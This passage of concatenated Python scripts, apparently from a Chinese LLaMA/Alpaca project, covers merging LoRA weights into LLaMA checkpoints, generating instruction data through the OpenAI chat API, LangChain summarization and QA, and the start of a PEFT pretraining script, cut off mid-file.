k.endswith(".self_attn.o_proj.weight"): return f"layers.{layer}.attention.wo.weight" elif k.endswith(".mlp.gate_proj.weight"): return f"layers.{layer}.feed_forward.w1.weight" elif k.endswith(".mlp.down_proj.weight"): return f"layers.{layer}.feed_forward.w2.weight" elif k.endswith(".mlp.up_proj.weight"): return f"layers.{layer}.feed_forward.w3.weight" elif k.endswith(".input_layernorm.weight"): return f"layers.{layer}.attention_norm.weight" elif k.endswith(".post_attention_layernorm.weight"): return f"layers.{layer}.ffn_norm.weight" elif k.endswith("rotary_emb.inv_freq") or "lora" in k: return None else: print(layer, k) raise NotImplementedError else: print(k) raise NotImplementedError def unpermute(w): return ( w.view(n_heads, 2, dim // n_heads // 2, dim).transpose(1, 2).reshape(dim, dim) ) def save_shards(model_sd, num_shards: int): # Add the no_grad context manager with torch.no_grad(): if num_shards == 1: new_state_dict = {} for k, v in model_sd.items(): new_k = translate_state_dict_key(k) if new_k is not None: if "wq" in new_k or "wk" in new_k: new_state_dict[new_k] = unpermute(v) else: new_state_dict[new_k] = v os.makedirs(output_dir, exist_ok=True) print(f"Saving shard 1 of {num_shards} into {output_dir}/consolidated.00.pth") torch.save(new_state_dict, output_dir + "/consolidated.00.pth") with open(output_dir + "/params.json", "w") as f: json.dump(params, f) else: new_state_dicts = [dict() for _ in range(num_shards)] for k in list(model_sd.keys()): v = model_sd[k] new_k = translate_state_dict_key(k) if new_k is not None: if new_k=='tok_embeddings.weight': print(f"Processing {new_k}") assert v.size(1)%num_shards==0 splits = v.split(v.size(1)//num_shards,dim=1) elif new_k=='output.weight': print(f"Processing {new_k}") if v.size(0)%num_shards==0: splits = v.split(v.size(0)//num_shards,dim=0) else: size_list = [v.size(0)//num_shards] * num_shards size_list[-1] += v.size(0)%num_shards splits = v.split(size_list, dim=0) # 13B: size_list == [24976,24977] elif new_k=='norm.weight': print(f"Processing {new_k}") splits = [v] * num_shards elif 'ffn_norm.weight' in new_k: print(f"Processing {new_k}") splits = [v] * num_shards elif 'attention_norm.weight' in new_k: print(f"Processing {new_k}") splits = [v] * num_shards elif 'w1.weight' in new_k: print(f"Processing {new_k}") splits = v.split(v.size(0)//num_shards,dim=0) elif 'w2.weight' in new_k: print(f"Processing {new_k}") splits = v.split(v.size(1)//num_shards,dim=1) elif 'w3.weight' in new_k: print(f"Processing {new_k}") splits = v.split(v.size(0)//num_shards,dim=0) elif 'wo.weight' in new_k: print(f"Processing {new_k}") splits = v.split(v.size(1)//num_shards,dim=1) elif 'wv.weight' in new_k: print(f"Processing {new_k}") splits = v.split(v.size(0)//num_shards,dim=0) elif "wq.weight" in new_k or "wk.weight" in new_k: print(f"Processing {new_k}") v = unpermute(v) splits = v.split(v.size(0)//num_shards,dim=0) else: print(f"Unexpected key {new_k}") raise ValueError for sd,split in zip(new_state_dicts,splits): sd[new_k] = split.clone() del split del splits del model_sd[k],v gc.collect() # Effectively enforce garbage collection os.makedirs(output_dir, exist_ok=True) for i,new_state_dict in enumerate(new_state_dicts): print(f"Saving shard {i+1} of {num_shards} into {output_dir}/consolidated.0{i}.pth") torch.save(new_state_dict, output_dir + f"/consolidated.0{i}.pth") with open(output_dir + "/params.json", "w") as f: print(f"Saving params.json into {output_dir}/params.json") json.dump(params, f) if __name__=='__main__': args = parser.parse_args() base_model_path = args.base_model lora_model_paths = [s.strip() for s in args.lora_model.split(',') if len(s.strip())!=0] output_dir = args.output_dir output_type = args.output_type offload_dir = args.offload_dir print(f"Base model: {base_model_path}") print(f"LoRA model(s) {lora_model_paths}:") if offload_dir is not None: # Load with offloading, which is useful for low-RAM machines. # Note that if you have enough RAM, please use original method instead, as it is faster. base_model = LlamaForCausalLM.from_pretrained( base_model_path, load_in_8bit=False, torch_dtype=torch.float16, offload_folder=offload_dir, offload_state_dict=True, low_cpu_mem_usage=True, device_map={"": "cpu"}, ) else: # Original method without offloading base_model = LlamaForCausalLM.from_pretrained( base_model_path, load_in_8bit=False, torch_dtype=torch.float16, device_map={"": "cpu"}, ) ## infer the model size from the checkpoint embedding_size = base_model.get_input_embeddings().weight.size(1) model_size = emb_to_model_size[embedding_size] print(f"Peft version: {peft.__version__}") print(f"Loading LoRA for {model_size} model") lora_model = None lora_model_sd = None for lora_index, lora_model_path in enumerate(lora_model_paths): print(f"Loading LoRA {lora_model_path}...") tokenizer = LlamaTokenizer.from_pretrained(lora_model_path) print(f"base_model vocab size: {base_model.get_input_embeddings().weight.size(0)}") print(f"tokenizer vocab size: {len(tokenizer)}") model_vocab_size = base_model.get_input_embeddings().weight.size(0) assert len(tokenizer) >= model_vocab_size, \ (f"The vocab size of the tokenizer {len(tokenizer)} is smaller than the vocab size of the base model {model_vocab_size}\n" "This is not the intended use. Please check your model and tokenizer.") if model_vocab_size != len(tokenizer): base_model.resize_token_embeddings(len(tokenizer)) print(f"Extended vocabulary size to {len(tokenizer)}") first_weight = base_model.model.layers[0].self_attn.q_proj.weight first_weight_old = first_weight.clone() print(f"Loading LoRA weights") if hasattr(peft.LoraModel,'merge_and_unload'): try: lora_model = PeftModel.from_pretrained( base_model, lora_model_path, device_map={"": "cpu"}, torch_dtype=torch.float16, ) except RuntimeError as e: if '[49953, 4096]' in str(e): print("The vocab size of the tokenizer does not match the vocab size of the LoRA weight. \n" "Did you misuse the LLaMA tokenizer with the Alpaca-LoRA weight?\n" "Make sure that you use LLaMA tokenizer with the LLaMA-LoRA weight and Alpaca tokenizer with the Alpaca-LoRA weight!") raise e assert torch.allclose(first_weight_old, first_weight) print(f"Merging with merge_and_unload...") base_model = lora_model.merge_and_unload() else: base_model_sd = base_model.state_dict() try: lora_model_sd = torch.load(os.path.join(lora_model_path,'adapter_model.bin'),map_location='cpu') except FileNotFoundError: print("Cannot find lora model on the disk. Downloading lora model from hub...") filename = hf_hub_download(repo_id=lora_model_path,filename='adapter_model.bin') lora_model_sd = torch.load(filename,map_location='cpu') if 'base_model.model.model.embed_tokens.weight' in lora_model_sd: assert lora_model_sd['base_model.model.model.embed_tokens.weight'].shape[0]==len(tokenizer), \ ("The vocab size of the tokenizer does not match the vocab size of the LoRA weight. \n" "Did you misuse the LLaMA tokenizer with the Alpaca-LoRA weight?\n" "Make sure that you use LLaMA tokenizer with the LLaMA-LoRA weight and Alpaca tokenizer with the Alpaca-LoRA weight!") lora_config = peft.LoraConfig.from_pretrained(lora_model_path) lora_scaling = lora_config.lora_alpha / lora_config.r fan_in_fan_out = lora_config.fan_in_fan_out lora_keys = [k for k in lora_model_sd if 'lora_A' in k] non_lora_keys = [k for k in lora_model_sd if not 'lora_' in k] for k in non_lora_keys: print(f"merging {k}") original_k = k.replace('base_model.model.','') base_model_sd[original_k].copy_(lora_model_sd[k]) for k in lora_keys: print(f"merging {k}") original_key = k.replace('.lora_A','').replace('base_model.model.','') assert original_key in base_model_sd lora_a_key = k lora_b_key = k.replace('lora_A','lora_B') base_model_sd[original_key] += ( transpose(lora_model_sd[lora_b_key].float() @ lora_model_sd[lora_a_key].float(),fan_in_fan_out) * lora_scaling ) assert base_model_sd[original_key].dtype == torch.float16 # did we do anything? assert not torch.allclose(first_weight_old, first_weight) tokenizer.save_pretrained(output_dir) if output_type=='huggingface': print("Saving to Hugging Face format...") LlamaForCausalLM.save_pretrained(base_model, output_dir) #, state_dict=deloreanized_sd) else: # output_type=='pth print("Saving to pth format...") base_model_sd = base_model.state_dict() del lora_model, base_model, lora_model_sd params = params_of_models[model_size] num_shards = num_shards_of_models[model_size] n_layers = params["n_layers"] n_heads = params["n_heads"] dim = params["dim"] dims_per_head = dim // n_heads base = 10000.0 inv_freq = 1.0 / (base ** (torch.arange(0, dims_per_head, 2).float() / dims_per_head)) save_shards(model_sd=base_model_sd, num_shards=num_shards) File: scripts/merge_llama_with_chinese_lora_low_mem.py """ Usage: python merge_llama_with_chinese_lora_low_mem.py \ --base_model path/to/llama/model \ --lora_model path/to/first/lora[,path/to/second/lora] \ --output_type [pth|huggingface] \ --output_dir path/to/output/dir """ import argparse import json import os import gc import torch import peft from transformers import LlamaTokenizer from transformers.modeling_utils import dtype_byte_size from huggingface_hub import snapshot_download import re parser = argparse.ArgumentParser() parser.add_argument('--base_model', default=None, required=True, type=str, help="Please specify a base model") parser.add_argument('--lora_model', default=None, required=True, type=str, help="Please specify LoRA models to be merged (ordered); use commas to separate multiple LoRA models") parser.add_argument('--output_type', default='pth',choices=['pth','huggingface'], type=str, help="Save the merged model in pth or huggingface format") parser.add_argument('--output_dir', default='./merged_model', type=str, help="The output folder to save the merged model") parser.add_argument('--verbose', default=False, action='store_true', help="Show detailed messages") emb_to_model_size = { 4096 : '7B', 5120 : '13B', 6656 : '33B', 8192 : '65B', } num_shards_of_models = {'7B': 1, '13B': 2, '33B': 4, '65B': 8} params_of_models = { '7B': { "dim": 4096, "multiple_of": 256, "n_heads": 32, "n_layers": 32, "norm_eps": 1e-06, "vocab_size": -1, }, '13B': { "dim": 5120, "multiple_of": 256, "n_heads": 40, "n_layers": 40, "norm_eps": 1e-06, "vocab_size": -1, }, '33B': { "dim": 6656, "multiple_of": 256, "n_heads": 52, "n_layers": 60, "norm_eps": 1e-06, "vocab_size": -1, }, '65B': { "dim": 8192, "multiple_of": 256, "n_heads": 64, "n_layers": 80, "norm_eps": 1e-05, "vocab_size": -1, }, } def transpose(weight, fan_in_fan_out): return weight.T if fan_in_fan_out else weight # Borrowed and modified from https://github.com/tloen/alpaca-lora def translate_state_dict_key(k): k = k.replace("base_model.model.", "") if k == "model.embed_tokens.weight": return "tok_embeddings.weight" elif k == "model.norm.weight": return "norm.weight" elif k == "lm_head.weight": return "output.weight" elif k.startswith("model.layers."): layer = k.split(".")[2] if k.endswith(".self_attn.q_proj.weight"): return f"layers.{layer}.attention.wq.weight" elif k.endswith(".self_attn.k_proj.weight"): return f"layers.{layer}.attention.wk.weight" elif k.endswith(".self_attn.v_proj.weight"): return f"layers.{layer}.attention.wv.weight" elif k.endswith(".self_attn.o_proj.weight"): return f"layers.{layer}.attention.wo.weight" elif k.endswith(".mlp.gate_proj.weight"): return f"layers.{layer}.feed_forward.w1.weight" elif k.endswith(".mlp.down_proj.weight"): return f"layers.{layer}.feed_forward.w2.weight" elif k.endswith(".mlp.up_proj.weight"): return f"layers.{layer}.feed_forward.w3.weight" elif k.endswith(".input_layernorm.weight"): return f"layers.{layer}.attention_norm.weight" elif k.endswith(".post_attention_layernorm.weight"): return f"layers.{layer}.ffn_norm.weight" elif k.endswith("rotary_emb.inv_freq") or "lora" in k: return None else: print(layer, k) raise NotImplementedError else: print(k) raise NotImplementedError def unpermute(w): return ( w.view(n_heads, 2, dim // n_heads // 2, dim).transpose(1, 2).reshape(dim, dim) ) def save_shards(model_sd, num_shards: int, prefix="", verbose=False): """ Convert and save the HF format weights to PTH format weights """ with torch.no_grad(): if num_shards == 1: new_state_dict = {} for k, v in model_sd.items(): new_k = translate_state_dict_key(k) if new_k is not None: if "wq" in new_k or "wk" in new_k: new_state_dict[new_k] = unpermute(v) else: new_state_dict[new_k] = v os.makedirs(output_dir, exist_ok=True) print(f"Saving shard 1 of {num_shards} into {output_dir}/{prefix}consolidated.00.pth") torch.save(new_state_dict, output_dir + f"/{prefix}consolidated.00.pth") else: new_state_dicts = [dict() for _ in range(num_shards)] for k in list(model_sd.keys()): v = model_sd[k] new_k = translate_state_dict_key(k) if new_k is not None: if new_k=='tok_embeddings.weight': assert v.size(1)%num_shards==0 splits = v.split(v.size(1)//num_shards,dim=1) elif new_k=='output.weight': if v.size(0)%num_shards==0: splits = v.split(v.size(0)//num_shards,dim=0) else: size_list = [v.size(0)//num_shards] * num_shards size_list[-1] += v.size(0)%num_shards splits = v.split(size_list, dim=0) # 13B: size_list == [24976,24977] elif new_k=='norm.weight': splits = [v] * num_shards elif 'ffn_norm.weight' in new_k: splits = [v] * num_shards elif 'attention_norm.weight' in new_k: splits = [v] * num_shards elif 'w1.weight' in new_k: splits = v.split(v.size(0)//num_shards,dim=0) elif 'w2.weight' in new_k: splits = v.split(v.size(1)//num_shards,dim=1) elif 'w3.weight' in new_k: splits = v.split(v.size(0)//num_shards,dim=0) elif 'wo.weight' in new_k: splits = v.split(v.size(1)//num_shards,dim=1) elif 'wv.weight' in new_k: splits = v.split(v.size(0)//num_shards,dim=0) elif "wq.weight" in new_k or "wk.weight" in new_k: v = unpermute(v) splits = v.split(v.size(0)//num_shards,dim=0) else: print(f"Unexpected key {new_k}") raise ValueError if verbose: print(f"Processing {new_k}") for sd,split in zip(new_state_dicts,splits): sd[new_k] = split.clone() del split del splits del model_sd[k],v gc.collect() # Effectively enforce garbage collection os.makedirs(output_dir, exist_ok=True) for i,new_state_dict in enumerate(new_state_dicts): print(f"Saving shard {i+1} of {num_shards} into {output_dir}/{prefix}consolidated.0{i}.pth") torch.save(new_state_dict, output_dir + f"/{prefix}consolidated.0{i}.pth") def merge_shards(output_dir, num_shards: int): ckpt_filenames = sorted([f for f in os.listdir(output_dir) if re.match('L(\d+)-consolidated.(\d+).pth',f)]) for i in range(num_shards): shards_filenames = sorted([f for f in ckpt_filenames if re.match(f'L(\d+)-consolidated.0{i}.pth',f)]) print(f"Loading {shards_filenames} ...") shards_dicts = [torch.load(os.path.join(output_dir,fn)) for fn in shards_filenames] shards_merged = {} for d in shards_dicts: shards_merged |= d print(f"Saving the merged shard to " + os.path.join(output_dir, f"consolidated.0{i}.pth")) torch.save(shards_merged, os.path.join(output_dir, f"consolidated.0{i}.pth")) print("Cleaning up...") del shards_merged for d in shards_dicts: del d del shards_dicts gc.collect() # Effectively enforce garbage collection for fn in shards_filenames: os.remove(os.path.join(output_dir,fn)) if __name__=='__main__': args = parser.parse_args() base_model_path = args.base_model lora_model_paths = [s.strip() for s in args.lora_model.split(',') if len(s.strip())!=0] output_dir = args.output_dir output_type = args.output_type os.makedirs(output_dir, exist_ok=True) print(f"Base model: {base_model_path}") print(f"LoRA model(s) {lora_model_paths}:") tokenizers_and_loras = [] for lora_model_path in lora_model_paths: print(f"Loading {lora_model_path}") if not os.path.exists(lora_model_path): print("Cannot find lora model on the disk. Downloading lora model from hub...") lora_model_path = snapshot_download(repo_id=lora_model_path) tokenizer = LlamaTokenizer.from_pretrained(lora_model_path) lora_config = peft.LoraConfig.from_pretrained(lora_model_path) lora_state_dict = torch.load(os.path.join(lora_model_path,'adapter_model.bin'),map_location='cpu') if 'base_model.model.model.embed_tokens.weight' in lora_state_dict: lora_vocab_size = lora_state_dict['base_model.model.model.embed_tokens.weight'].shape[0] assert lora_vocab_size==len(tokenizer), \ (f"The vocab size of the tokenizer {len(tokenizer)} does not match the vocab size of the LoRA weight {lora_vocab_size}.\n" "Make sure that you use LLaMA tokenizer with the LLaMA-LoRA weight and Alpaca tokenizer with the Alpaca-LoRA weight!") tokenizers_and_loras.append( { "tokenizer" :tokenizer, "state_dict" :lora_state_dict, "config": lora_config, "scaling": lora_config.lora_alpha / lora_config.r, "fan_in_fan_out" : lora_config.fan_in_fan_out, }) if len(tokenizers_and_loras)==2: t1_vocab_size = len(tokenizers_and_loras[0]["tokenizer"]) t2_vocab_size = len(tokenizers_and_loras[1]["tokenizer"]) assert t1_vocab_size<=t2_vocab_size, \ (f"The vocab size of the first tokenizer is {t1_vocab_size}\n" f"The vocab size of the second tokenizer is {t2_vocab_size}, found to be smaller than {t1_vocab_size}\n" "This is not the intended use. Please check your model and tokenizer.") if not os.path.exists(base_model_path): print("Cannot find lora model on the disk. Downloading lora model from hub...") base_model_path = snapshot_download(repo_id=base_model_path) ckpt_filenames = sorted([f for f in os.listdir(base_model_path) if re.match('pytorch_model-(\d+)-of-(\d+).bin',f)]) embedding_size = None model_size = None total_size = 0 for index, filename in enumerate(ckpt_filenames): print(f"Loading ckpt {filename}") state_dict = torch.load(os.path.join(base_model_path,filename), map_location='cpu') if index == 0: embedding_size = state_dict['model.embed_tokens.weight'].shape[1] model_size = emb_to_model_size[embedding_size] if output_type=='pth': params = params_of_models[model_size] num_shards = num_shards_of_models[model_size] n_layers = params["n_layers"] n_heads = params["n_heads"] dim = params["dim"] dims_per_head = dim // n_heads base = 10000.0 inv_freq = 1.0 / (base ** (torch.arange(0, dims_per_head, 2).float() / dims_per_head)) print("Merging...") for k in state_dict: for tl_idx, t_and_l in enumerate(tokenizers_and_loras): saved_key = 'base_model.model.'+k lora_key_A = saved_key.replace('.weight','.lora_A.weight') if saved_key in t_and_l['state_dict']: if args.verbose: print(f"copying {saved_key} from {tl_idx}-th LoRA weight to {k}") state_dict[k] = t_and_l['state_dict'][saved_key].half().clone() # do we need half()? if lora_key_A in t_and_l['state_dict']: lora_key_B = lora_key_A.replace('lora_A.weight','lora_B.weight') if args.verbose: print(f"merging {lora_key_A} and lora_B.weight form {tl_idx}-th LoRA weight to {k}") state_dict[k] += ( transpose( t_and_l['state_dict'][lora_key_B].float() @ t_and_l['state_dict'][lora_key_A].float(), t_and_l['fan_in_fan_out']) * t_and_l['scaling'] ) weight_size = state_dict[k].numel() * dtype_byte_size(state_dict[k].dtype) total_size += weight_size if output_type=='huggingface': print(f"Saving ckpt {filename} to {output_dir} in HF format...") torch.save(state_dict,os.path.join(output_dir, filename)) elif output_type=='pth': print(f"Converting to pth format...") save_shards(model_sd=state_dict, num_shards=num_shards,prefix=f"L{index+1}-", verbose=args.verbose) del state_dict gc.collect() # Effectively enforce garbage collection print(f"Saving tokenizer") tokenizers_and_loras[-1]['tokenizer'].save_pretrained(output_dir) if output_type == 'pth': with open(output_dir + "/params.json", "w") as f: print(f"Saving params.json into {output_dir}/params.json") json.dump(params, f) merge_shards(output_dir, num_shards=num_shards) if output_type=='huggingface': configs = ('config.json', 'generation_config.json', 'pytorch_model.bin.index.json') for config in configs: if os.path.exists(os.path.join(base_model_path, config)): print(f"Saving {config}") with open(os.path.join(base_model_path, config),'r') as f: obj = json.load(f) if config=='config.json': obj['vocab_size'] = len(tokenizers_and_loras[-1]['tokenizer']) if config=='pytorch_model.bin.index.json': obj['metadata']['total_size'] = total_size with open(os.path.join(output_dir, config), 'w') as f: json.dump(obj, f, indent=2) print("Done.") File: scripts/crawl_prompt.py import openai import sys import random openai.api_key = "" # you must provide your OpenAI API key before crawling if not openai.api_key: raise ValueError("OpenAI API key not provided. Please set the 'openai.api_key' variable.") def return_random_prompt(): system_prompt = "你需要尽可能给出多样化的任务指令和对应的回答。我们将用于人工评估ChatGPT模型对指令的完成情况。要求:\n" # generate random topics topic_list = ["科技", "娱乐", "体育", "金融", "时政", "教育", "医疗", "旅游", "美食", "汽车", "房产", "文化", "历史", "地理", "自然", "人文", "社会", "法律", "军事", "政治", "经济", "文学", "艺术", "宗教", "哲学", "语言", "数学", "物理", "化学", "生物", "地球科学", "天文学", "计算机科学", "工程", "建筑", "设计", "音乐", "舞蹈", "电影", "电视", "动漫", "游戏", "健康", "美容", "时尚", "家居", "家电", "家具", "家装", "母婴", "育儿", "职场", "工作", "生活", "养生", "心理", "情感", "人际", "社交", "交友", "恋爱", "婚姻", "家庭", "亲子", "宠物", "动物", "植物", "食品", "饮料", "餐饮", "酒店", "购物", "消费", "理财", "税务", "法规", "法院", "司法", "刑事", "民事", "行政", "战争"] system_prompt += "1. 主题多样化,涵盖各个领域,例如:" + "、".join(random.sample(topic_list, 10)) + "等。\n" # generate random tasks task_list = ["开放式生成", "分类", "问答", "编辑", "摘要", "写作", "翻译", "写代码", "分析", "代码解析", "常识推理", "写信", "抽取", "推荐"] system_prompt += "2. 表述多样化,结合真实问题;指令类型多样化,例如:" + "、".join(random.sample(task_list, 10)) + "等。\n" # other requirements system_prompt += "3. 如果遇到无法处理的指令(只靠文本无法回答),给出无法处理的回复。\n" system_prompt += "4. 除非特别要求,请使用中文,指令可以是命令句、疑问句、或其他合适的类型。\n" system_prompt += "5. 为指令生成一个适当且涉及真实情况的<input>,不应该只包含简单的占位符。<input>应提供实质性的内容,具有挑战性。字数不超过" + str(random.randint(80, 120)) + "字。\n" system_prompt += "6. <output>应该是对指令的适当且真实的回应,不能只回复答应或拒绝请求。如果需要额外信息才能回复时,请努力预测用户意图并尝试回复。<output>的内容应少于" + str(random.randint(128, 512)) + "字。\n\n" system_prompt += "请给出满足条件的20条JSON格式数据:\n" return system_prompt if __name__ == "__main__": if len(sys.argv) != 2: print("Usage: python crawl_prompt.py <output_file>") exit(1) output_file = open(sys.argv[1], 'w') MAX_EPOCHS = 1 # number of data to generate (each prompt contains 20 JSON-formatted data) for k in range(MAX_EPOCHS): response = openai.ChatCompletion.create( model="gpt-3.5-turbo", # here we use `gpt-3.5-turbo` model, while Stanford-Alpaca uses `text-davinci-003` messages=[ {"role": "user", "content": return_random_prompt()}, ] ) output_file.write(response["choices"][0]["message"]["content"] + '\n') output_file.close() File: scripts/langchain/langchain_sum.py import argparse import os parser = argparse.ArgumentParser() parser.add_argument('--file_path',required=True,type=str) parser.add_argument('--model_path',required=True,type=str) parser.add_argument('--gpus', default="0", type=str) parser.add_argument('--chain_type', default="refine", type=str) args = parser.parse_args() os.environ["CUDA_VISIBLE_DEVICES"] = args.gpus # os.environ['PROTOCOL_BUFFERS_PYTHON_IMPLEMENTATION']='python' file_path = args.file_path model_path = args.model_path import torch from langchain import HuggingFacePipeline from langchain.text_splitter import RecursiveCharacterTextSplitter from langchain.prompts import PromptTemplate from langchain.chains.summarize import load_summarize_chain prompt_template = ("Below is an instruction that describes a task. " "Write a response that appropriately completes the request.\n\n" "### Instruction:\n请为以下文字写一段摘要:\n{text}\n\n### Response: ") refine_template = ( "Below is an instruction that describes a task." "Write a response that appropriately completes the request.\n\n" "### Instruction:\n" "已有一段摘要:{existing_answer}\n" "现在还有一些文字,(如果有需要)你可以根据它们完善现有的摘要。" "\n" "{text}\n" "\n" "如果这段文字没有用,返回原来的摘要即可。请你生成一个最终的摘要。" "\n\n### Response: " ) if __name__ == '__main__': load_type = torch.float16 if torch.cuda.is_available(): device = torch.device(0) else: device = torch.device('cpu') text_splitter = RecursiveCharacterTextSplitter(chunk_size=600, chunk_overlap=100, length_function=len) with open(file_path) as f: text = f.read() docs = text_splitter.create_documents([text]) print("loading LLM...") model = HuggingFacePipeline.from_model_id(model_id=model_path, task="text-generation", model_kwargs={ "torch_dtype" : load_type, "low_cpu_mem_usage" : True, "temperature": 0.2, "max_length": 1000, "device_map": "auto", "repetition_penalty":1.1} ) PROMPT = PromptTemplate(template=prompt_template, input_variables=["text"]) REFINE_PROMPT = PromptTemplate( template=refine_template,input_variables=["existing_answer", "text"], ) if args.chain_type == "stuff": chain = load_summarize_chain(model, chain_type="stuff", prompt=PROMPT) elif args.chain_type == "refine": chain = load_summarize_chain(model, chain_type="refine", question_prompt=PROMPT, refine_prompt=REFINE_PROMPT) print(chain.run(docs)) File: scripts/langchain/langchain_qa.py import argparse import os parser = argparse.ArgumentParser() parser.add_argument('--file_path',required=True,type=str) parser.add_argument('--embedding_path',required=True,type=str) parser.add_argument('--model_path',required=True,type=str) parser.add_argument('--gpus', default="0", type=str) parser.add_argument('--chain_type', default="refine", type=str) args = parser.parse_args() os.environ["CUDA_VISIBLE_DEVICES"] = args.gpus # os.environ['PROTOCOL_BUFFERS_PYTHON_IMPLEMENTATION']='python' file_path = args.file_path embedding_path = args.embedding_path model_path = args.model_path import torch from langchain import HuggingFacePipeline from langchain.text_splitter import RecursiveCharacterTextSplitter from langchain.vectorstores import FAISS from langchain.document_loaders import TextLoader from langchain.prompts import PromptTemplate from langchain.chains import RetrievalQA from langchain.embeddings.huggingface import HuggingFaceEmbeddings prompt_template = ("Below is an instruction that describes a task. " "Write a response that appropriately completes the request.\n\n" "### Instruction:\n{context}\n{question}\n\n### Response: ") refine_prompt_template = ( "Below is an instruction that describes a task. " "Write a response that appropriately completes the request.\n\n" "### Instruction:\n" "这是原始问题: {question}\n" "已有的回答: {existing_answer}\n" "现在还有一些文字,(如果有需要)你可以根据它们完善现有的回答。" "\n\n" "{context_str}\n" "\\nn" "请根据新的文段,进一步完善你的回答。\n\n" "### Response: " ) initial_qa_template = ( "Below is an instruction that describes a task. " "Write a response that appropriately completes the request.\n\n" "### Instruction:\n" "以下为背景知识:\n" "{context_str}" "\n" "请根据以上背景知识, 回答这个问题:{question}。\n\n" "### Response: " ) if __name__ == '__main__': load_type = torch.float16 if torch.cuda.is_available(): device = torch.device(0) else: device = torch.device('cpu') loader = TextLoader(file_path) documents = loader.load() text_splitter = RecursiveCharacterTextSplitter( chunk_size=600, chunk_overlap=100) texts = text_splitter.split_documents(documents) print("Loading the embedding model...") embeddings = HuggingFaceEmbeddings(model_name=embedding_path) docsearch = FAISS.from_documents(texts, embeddings) print("loading LLM...") model = HuggingFacePipeline.from_model_id(model_id=model_path, task="text-generation", model_kwargs={ "torch_dtype" : load_type, "low_cpu_mem_usage" : True, "temperature": 0.2, "max_length": 1000, "device_map": "auto", "repetition_penalty":1.1} ) if args.chain_type == "stuff": PROMPT = PromptTemplate( template=prompt_template, input_variables=["context", "question"] ) chain_type_kwargs = {"prompt": PROMPT} qa = RetrievalQA.from_chain_type( llm=model, chain_type="stuff", retriever=docsearch.as_retriever(search_kwargs={"k": 1}), chain_type_kwargs=chain_type_kwargs) elif args.chain_type == "refine": refine_prompt = PromptTemplate( input_variables=["question", "existing_answer", "context_str"], template=refine_prompt_template, ) initial_qa_prompt = PromptTemplate( input_variables=["context_str", "question"], template=initial_qa_template, ) chain_type_kwargs = {"question_prompt": initial_qa_prompt, "refine_prompt": refine_prompt} qa = RetrievalQA.from_chain_type( llm=model, chain_type="refine", retriever=docsearch.as_retriever(search_kwargs={"k": 1}), chain_type_kwargs=chain_type_kwargs) while True: query = input("请输入问题:") if len(query.strip())==0: break print(qa.run(query)) File: scripts/training/run_clm_pt_with_peft.py #!/usr/bin/env python # coding=utf-8 # Copyright 2020 The HuggingFace Inc. team. All rights reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """ Fine-tuning the library models for causal language modeling (GPT, GPT-2, CTRL, ...) on a text file or a dataset. Here is the full list of checkpoints on the hub that can be fine-tuned by this script: https://huggingface.co/models?filter=text-generation """ # You can also adapt this script on your own causal language modeling task. Pointers for this are left as comments. import logging import numpy as np import math import os import sys from dataclasses import dataclass, field from itertools import chain from typing import Optional, List, Dict, Any, Mapping from pathlib import Path import datasets import torch from datasets import load_dataset, concatenate_datasets import transformers from transformers import ( CONFIG_MAPPING, MODEL_FOR_CAUSAL_LM_MAPPING, AutoConfig, AutoModelForCausalLM, LlamaForCausalLM, LlamaTokenizer, AutoTokenizer, HfArgumentParser, Trainer, TrainingArguments, is_torch_tpu_available, set_seed, ) from transformers.testing_utils import CaptureLogger from transformers.trainer_utils import get_last_checkpoint from transformers.utils import send_example_telemetry from transformers.utils.versions import require_version from sklearn.metrics import accuracy_score from peft import LoraConfig, TaskType, get_peft_model, PeftModel, get_peft_model_state_dict from transformers.trainer_utils import PREFIX_CHECKPOINT_DIR class SavePeftModelCallback(transformers.TrainerCallback): def save_model(self, args, state, kwargs): if state.best_model_checkpoint is not None: checkpoint_folder = os.path.join(state.best_model_checkpoint, "pt_lora_model") else: checkpoint_folder = os.path.join(args.output_dir, f"{PREFIX_CHECKPOINT_DIR}-{state.global_step}") peft_model_path = os.path.join(checkpoint_folder, "pt_lora_model") kwargs["model"].save_pretrained(peft_model_path) kwargs["tokenizer"].save_pretrained(peft_model_path) def on_save(self, args, state, control, **kwargs): self.save_model(args, state, kwargs) return control def on_train_end(self, args, state, control, **kwargs): peft_model_path = os.path.join(args.output_dir, "pt_lora_model") kwargs["model"].save_pretrained(peft_model_path) kwargs["tokenizer"].save_pretrained(peft_model_path) def accuracy(predictions, references, normalize=True, sample_weight=None): return { "accuracy": float( accuracy_score(references, predictions, normalize=normalize, sample_weight=sample_weight) ) } def compute_metrics(eval_preds): preds, labels = eval_preds # preds have the same shape as the labels, after the argmax(-1) has been calculated # by preprocess_logits_for_metrics but we need to shift the labels labels = labels[:, 1:].reshape(-1) preds = preds[:, :-1].reshape(-1) return accuracy(predictions=preds, references=labels) def preprocess_logits_for_metrics(logits, labels): if isinstance(logits, tuple): # Depending on the model and config, logits may contain extra tensors, # like past_key_values, but logits always come first logits = logits[0] return logits.argmax(dim=-1) def fault_tolerance_data_collator(features: List) -> Dict[str, Any]: if not isinstance(features[0], Mapping): features = [vars(f) for f in features] first = features[0] batch = {} # Special handling for labels. # Ensure that tensor is created with the correct type # (it should be automatically the case, but let's make sure of it.) if "label" in first and first["label"] is not None: label = first["label"].item() if isinstance(first["label"], torch.Tensor) else first["label"] dtype = torch.long if isinstance(label, int) else torch.float batch["labels"] = torch.tensor([f["label"] for f in features], dtype=dtype) elif "label_ids" in first and first["label_ids"] is not None: if isinstance(first["label_ids"], torch.Tensor): batch["labels"] = torch.stack([f["label_ids"] for f in features]) else: dtype = torch.long if isinstance(first["label_ids"][0], int) else torch.float batch["labels"] = torch.tensor([f["label_ids"] for f in features], dtype=dtype) # Handling of all other possible keys. # Again, we will use the first element to figure out which key/values are not None for this model. try: for k, v in first.items(): if k not in ("label", "label_ids") and v is not None and not isinstance(v, str): if isinstance(v, torch.Tensor): batch[k] = torch.stack([f[k] for f in features]) elif isinstance(v, np.ndarray): batch[k] = torch.tensor(np.stack([f[k] for f in features])) else: batch[k] = torch.tensor([f[k] for f in features]) except ValueError: # quick fix by simply take the first example for k, v in first.items(): if k not in ("label", "label_ids") and v is not None and not isinstance(v, str): if isinstance(v, torch.Tensor): batch[k] = torch.stack([features[0][k]] * 